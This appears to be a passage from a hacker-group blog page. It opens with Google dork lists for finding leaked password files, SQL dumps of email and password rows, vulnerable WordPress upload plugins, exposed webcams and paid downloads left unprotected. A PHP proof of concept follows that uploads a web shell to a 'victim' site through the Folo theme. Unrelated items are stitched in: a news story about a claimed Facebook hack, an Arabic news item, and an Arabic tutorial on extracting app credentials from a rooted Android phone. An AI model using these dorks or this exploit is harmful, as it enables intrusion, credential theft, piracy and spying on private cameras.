e.) ”iloveyou” = hashed password
ext:sql intext:@gmail.com intext:f25a2fc72690b780b2a14e140ef6a9e0
2.) Variation of above search:
a.) ext:sql intext:”INSERT INTO” intext:@gmail.com intext:password
b.) ext:sql intext:”INSERT INTO” intext:@yahoo.com intext:password
c.) ext:sql intext:”INSERT INTO” intext:@hotmail.com intext:password
d.) ext:sql intext:”INSERT INTO” intext:@att.net intext:password
e.) ext:sql intext:”INSERT INTO” intext:@comcast.net intext:password
f.) ext:sql intext:”INSERT INTO” intext:@verizon.net intext:password
3.) SQLi
allinurl:/privmsg.php
E.) WORDPRESS GOOGLE DORKS
1.) Asset Manager Plugin Exploit – Unprotected Remote File Upload Vuleralbility.
inurl:Editor/assetmanager/assetmanager.asp
2.) Timthumb Plugin Exploit – Attacker can attach a shell to a image file and upload the shell. (It has been patched, but there are still a lot of webmasters who have NOT updated!)
inurl:index.of thumb.php
inurl:thumb.php
3.) Search for plugins directory:
inurl:wp-content/plugins/
4.) Search for themes directory:
inurl:wp-content/themes/
F.) PASSWORD FILE GOOGLE DORKS
1.) Search for Microsoft Excel data file:
”Login: *” “password =*” filetype: xls
2.) Search for auth_user_file:
allinurl: auth_user_file.txt
3.) Search for username/password saved in Microsoft Excel files:
filetype: xls inurl: “password.xls”
4.) Search for login pages:
intitle: login password
5.) Search for “master password” page:
intitle: “Index of” master.passwd
6.) Search for backup directory:
index of /backup
7.) Search for password backup file index:
intitle:index.of passwd.bak
8.) Search for password databases:
intitle:index.of pwd.db
intitle:”index of” pwd.db
9.) Search for /etc/passwd/ index:
intitle:”index of .. etc” passwd
10.) Search for plaintext password file:
index.of passlist.txt
inurl:passlist.txt
11.) Search for hidden documents/password files:
index.of.secret
index.of.private
12.) Search for PhpMyAdmin files:
”# PhpMyAdmin MySQL-Dump” filetype: txt
13.) Hidden Superuser (root) data files:
inurl:ipsec.secrets-history-bugs
inurl:ipsec.secrets “holds shared secrets”
14.) Find the information files:
inurl:ipsec.conf-intitle:manpage
15.) Search for a stored password in a database:
filetype:ldb admin
16.) Search for admin.php file:
inurl:search/admin.php
17.) Search for password log files:
inurl:password.log filetype:log
18.) Search for Hkey_Current_User in registry files:
filetype: reg HKEY_CURRENT_USER username
19.) Search for username/password file backups:
”Http://username: password @ www …” filetype: bak inurl: “htaccess | passwd | shadow | ht users”
20.) Search for username/password files:
filetype:mdb inurl:”account|users|admin|administrators|passwd|password” mdb files
21.) Search for Microsoft Frontpage passwords:
ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
22.) Search for SQL database Code and passwords:
filetype: sql ( “passwd values ****” |” password values ****” | “pass values ****”)
23.) Search for e-mail account files:
intitle: “Index Of”-inurl: maillog
G.) MISC. DORKS
1.) WebWiz Rich Text Editor (RTE) – Remote file upload vulneralbility:
inurl:rte/my_documents/my_files
2.) EZFilemanager – Remote file upload vulneralbility:
inurl:ezfilemanager/ezfilemanager.php
3.) robots.txt – See directories hidden from crawlers. Also sometimes you can pull off a directory transversal with this:
inurl:robots.txt
4.) Serial Numbers – Look for software serial numbers
”software name” 94FBR
H.) FIND FREE SWAG
1.) site:*.com intitle:”Thank You For Your Order” intext:Click Here to Download
2.) site:*.net intitle:”Thank You For Your Order” intext:Click Here to Download
3.) site:*.co intitle:”Thank You For Your Order” intext:Click Here to Download
4.) site:*.org intitle:”Thank You For Your Order” intext:Click Here to Download
5.) site:*.biz intitle:”Thank You For Your Order” intext:Click Here to Download
6.) site:*.tv intitle:”Thank You For Your Order” intext:Click Here to Download
7.) site:*.co.uk intitle:”Thank You For Your Order” intext:Click Here to Download
8.) site:*.org.uk intitle:”Thank You For Your Order” intext:Click Here to Download
9.) site:*.eu intitle:”Thank You For Your Order” intext:Click Here to Download
10.) intitle:Thank you for your purchase! intext:PLR OR MRR OR Package OR Bonus
11.) intitle:Thank you for your order! intext:PLR OR MRR OR Package OR Bonus
12.) intitle:Thank you for your order! intext:PLR OR MRR
13.) intitle:Thank you for your Purchase! intext:PLR OR MRR
14.) inurl:/thankyou*.html intitle:Thank you for your order!
15.) intext:Click Here To Download
16.) inurl:thanks intext:”Thank You For Your Order!” “Click Here” filetype:html
17.) intitle:Thank You For Your Order! intext:Private Label
18.) intitle:Thank You For Your Purchased! intext:Private Label
19.) intext:”Thank You For Your Order” intext:PLR
20.) intitle:”Thank You For Your Order!” intext:download
21.) intitle:”Thank You For Your Order” intext:Click Here To Download Now
22.) intitle:Thank you for your purchase! intext:Click Here to Download
23.) * thank you for your order download
24.) * intitle:Thank you for your Purchase! intext:PLR OR MRR OR Package OR Bonus
25.) * intitle:Thank you for your order! intext:PLR OR MRR
26.) * intitle:Thank You For Your Purchase! intext:Click Here to Download
27.) * intitle:Thank You For Your Order! intext:download
28.) inurl:index.of .mp3
29.) inurl:index.of .mov
30.) inurl:index.of .iso
31.) ?intitle:index.of? mp3
32.) ?intitle:index.of? mov
33.) ?intitle:index.of? iso
34.) inurl:”insert filetype”:iso+OR+exe+OR+zip+OR+rar+OR+gzip+OR+tar
35.) intext:”parent directory” intext:”[EXE]“
36.) intext:”parent directory” index of:”[EXE]“
37.) intext:”parent directory” index of:”[RAR]“
38.) intext:”parent directory” intext:”[VID]“
39.) intext:”parent directory” index of:”[VID]“
40.) intext:”parent directory” intext:”[MP3]“
41.) intext:”parent directory” index of:”[MP3]“
42.) intext:”parent directory” index of:”[Gamez]“
I.) WEBCAM GOOGLE DORKS
1.) inurl:/view.index.shtml
2.) inurl:/view.shtml
3.) intitle:”Live View / – AXIS” | inurl:view/view.shtml^
4.) inurl:ViewerFrame?Mode=
5.) inurl:ViewerFrame?Mode=Refresh

Follow @KAMINDOZ Tweet

WordPress Folo Shell Upload

KAMINDOZ SHIA TEAM

GROUP SHIA TEAM BLOG SHIA TEAM SEARCH EXPLOIT 

Exploit Title : WordPress Themes Folo Arbitrary File Upload Vulnerability
#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome
#Dork : inurl:/wp-content/themes/folo/
#Exploit : http://victim/%5BPATH%5D/wp-content/themes/folo/themify/themify-ajax.php
#POC :
$uploadfile=”ReC0ded.php”;
$ch = curl_init(“http://victim/%5BPATH%5D/wp-content/themes/folo/themify/themify-ajax.php?upload=1″);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(‘Filedata’=>”@$uploadfile”));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
#Results See Your Shell On : http://victim/%5BPATH%5D/wp-content/themes/folo/uploads/{YOUR_FILE}.php

Follow @KAMINDOZ Tweet

Hacker removed Mark Zuckerberg's Facebook Timeline Cover Photo

Something unusual happened today, Mark Zuckerberg's Facebook Timeline Cover Photo is removed, as shown in the above Screenshot.

Suddenly, after few hours, I got a mail from an Egyptian Hacker with nickname 'Dr.FarFar', claimed that he has hacked the Mark Zuckerberg's Facebook Profile and removed the Cover Photo using a private exploit.

The hacker has not provided any technical details about the vulnerability he used, but it seems that Zuckerberg has not noticed the removed Cover Photo on his profile.

It could be possible that Zuckerberg removed his Cover Photo himself, and someone is trying to take responsibility for the changes, but I still have a positive feeling that - May be a Minor, but its a Hack!
Previously in August 2013, Palestinian programmer discovered a security flaw in Facebook that allowed him to write a post on Facebook CEO Mark Zuckerberg's personal timeline without his permission.

Well, we are trying to get more information from the hacker about the flaw, as well as contacted Facebook for confirmation of the hack. I will update the story shortly after getting more updates.

Stay Tuned!

Update: Hacker explained, he used the Report abuse option on Zuckerberg's Cover image, and choose, 'I don't like this photo of me' and then "I used Fiddler2 Debugger Program to edit the request" he said.

Update: Within a few hours after 'The Hacker News' exclusive report, Mark Zuckerberg has finally restored his Cover image on Facebook Profile, as shown and but the company has not issued any statement to us.

Update: In a mail to THN, Facebook's spokesperson said, "There is no merit to this claim. We have confirmed there was no suspicious activity on the account."

Follow @KAMINDOZ Tweet

العراق: 20 مليون دينار لمن يقتل أجنبياً من داعش و30 مليون لم يعتقله

العراق يخصص مكافئات لمن يقتل ويعتقل عناصر داعش

خصصت وزارة الدفاع العراقية الیوم الخميس، مكافأة قدرها 20 مليون دينار لمن يقتل إرهابياً أجنبياً من "داعش" والقاعدة و 30 مليون لمن يعتقل أحدهم.

وقالت قناة العراقية شبه الرسمية في خبر عاجل أورده موقع السومرية نيوز، إن "وزارة الدفاع تعلن عن مكافأة قدرها 20 مليون دينار لكل من يقتل إرهابياً أجنبياً من داعش والقاعدة، و30 مليون لمن يلقي القبض على إرهابي منهم".
يذكر أن محافظة الأنبار، ومركزها الرمادي (110 كم غرب العاصمة بغداد) تشهد منذ (21 كانون الأول 2013)، عملية عسكرية واسعة النطاق في المحافظة تمتد حتى الحدود الأردنية والسورية، تشارك بها قطعات عسكرية ومروحيات قتالية إلى جانب مسلحين من العشائر، لملاحقة تنظيم ما يعرف بدولة العراق والشام الإسلامية "داعش"، وأدت إلى مقتل وإصابة واعتقال وطرد العشرات من عناصر التنظيم، وما تزال المعارك مستمرة، ما أدى إلى حصول حركة نزوح كبيرة لمئات العوائل في الأنبار هروباً من المعارك.

Follow @KAMINDOZ Tweet

التحليل الجنائي لاجهزة الاندرويد

سم الله الرحمن الرحيم
والسلام عليكم ورحمة الله وبركاته جميعاً

شرح اليوم سوف يكون عن طرق التحليل الجنائي لاجهزة الاندرويد
طبعاً شرحي يتكون من 10% من التحليل الجنائي لاجهزة الاندرويد ، حيث سوف نقوم بمحاولة استخراج باسوورد والايميل لبرنامج معين مثبت مسبقاً على الجوال ،  أردت ان يكون خفيف وسريع وان شاء الله الجميع يستفيد
# ما نحتاج اليه في هذا الشرح :
1.جهاز اندرويد ، ويفضل ان يكون حاصل على صلاحيات الروت
2. نظام Kali Linux
3.تثبيت Android SDK

في بادئ الامر ، نقوم بوضع الجوال على وضعيه USB DEBUGGING ، ومن ثم نقوم بأيصاله USB

بعد ذلك نقوم بفتح تيرمنال ونقوم بالذهاب للمسار الاتي :





ولنتأكد من الاجهزه الموصوله بالنظام نقوم بكتابه ,
./adb devices
لننتقل الى المرحلة التاليه وهي ، الحصول على shell ، من خلال كتابة الامر
./adb shell ، والحصول على صلاحية روت بكتابة su root


حصلنا على شل روت ، قبل ان نكمل العملية يجب ان نتعرف على نظام الملفات الموجود في الاندرويد



طبعاً الصوره واضحه جداً وما يهمنا هو مجلدين [ Shared_prefs & database ]
نقوم بالذهاب الى مجلد الذي يتواجد فيه البرامج المثبته على الجوال ، ونستعرض المجلدات بالامر ls





على سبيل المثال سوف اقوم بالدخول الى مجلد برنامج KIK الشهير





ومن ثم Shared_prefs









نقوم باستعراض الملفات المتواجده في المجلد [ ls ] ، وقراءة الملفات الموجوده بالامر cat
فيكون الناتج كالتالي /


كما هو واضح لكم ، اسم المستخدم ، والايميل ، والباسوورد المشفر …الخ

ولو اردت استعراض قواعد البيانات المتواجد لكل برنامج


نسحب قاعدة البيانات للنظام ونستخدم اداة Sqlite3
والاوامر المستخدمه في استعراض قواعد البيانات من خلالها





والسلام عليكم ورحمة الله وبركاته

Follow @KAMINDOZ Tweet